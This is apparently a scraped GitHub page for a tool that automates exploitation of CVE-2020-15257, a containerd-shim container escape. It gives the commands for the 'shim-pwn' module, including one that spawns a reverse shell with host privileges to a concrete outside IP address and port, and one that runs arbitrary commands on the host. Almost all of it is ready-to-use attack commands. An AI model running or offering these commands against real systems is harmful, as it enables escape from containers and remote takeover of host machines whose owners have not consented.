We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
自动化逃逸CVE-2020-15257,反弹宿主机的shell到远端服务器。
Automatic exploit CVE-2020-15257, spawn a reverse shell with host privilege to remote server.
reverse shell ./cdk run shim-pwn reverse <RHOST> <RPORT> execute command ./cdk run shim-pwn "<shell_cmd>"
reverse shell
./cdk run shim-pwn reverse 47.104.151.168 111
execute command
./cdk run shim-pwn "touch /tmp/exploit_success"